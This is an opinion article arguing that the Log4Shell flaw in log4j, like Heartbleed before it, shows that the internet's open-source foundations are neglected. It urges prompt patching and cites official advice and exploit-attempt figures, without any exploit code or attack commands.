Log4Shell: Why aren't we taking the security of the internet seriously?
To be caught out once may be an oversight, and lessons can be learned. But twice over a seven year timespan, shows a laissez faire attitude to the stability of the internet.
In 2014, Heartbleed reared its ugly head, and demonstrated to the world that the open standards that run the internet – in this case the OpenSSL library that provides SSL/TLS secure communications – are fundamentally flawed. Anyone using this library, either directly, or in software that embedded it, were at risk. As a result, the whole of the internet was compromised.
Wind the clock forward. There is now an equally devastating flaw. This time it is in log4j, the Java-based logging tool. Dubbed Log4Shell, this is much more like Heartbleed. It is embedded everywhere in the world, all down to the little devices in people’s homes. The challenge is to understand where it is.
Strong software development controls
Any developers building Java applications need to ask if their applications are using log4j. In large organisations with mature software development practices, enterprise software developers usually have sound component management. This means they can identify which of their applications use software modules that require log4j . Is it being imported through some other module the developer needs to build the application? The National Cyber Security Centre has urged organisations to patch applications as soon as possible. “The key step for organisations is to patch enterprise software quickly, and for developers using log4j to update and distribute their software as soon as possible,” it said in a statement.
The underlying vulnerability has been around for years. In fact, a design flaw in Java RMI that makes log4j vulnerable, was presented at BlackHat 2016. But there had not been exploits. However, as of December 13, approximately 72 hours after disclosure, security firm Check Point said its systems had stopped more than 846,000 attempts to exploit log4j, 46% of them made by known malicious groups.
This raises serious questions over internet governance and funding. If a flaw has been known about since 2016, why didn’t anyone bother to fix it? The reason is because there was no burning platform. No one bothered fixing the Java RMI flaw, because the experts believed it would be impossible to target devices and servers remotely. But log4j provides a means for developers to check the health of their applications remotely, through remote logging. A proof of concept code snippet written in Python, shows how easily it can be exploited. The fact that coding an exploit is so simple means that Log4Shell could decimate internet security.
We should have learned from HeartBleed. Flaws within the code that forms the internet affect us all.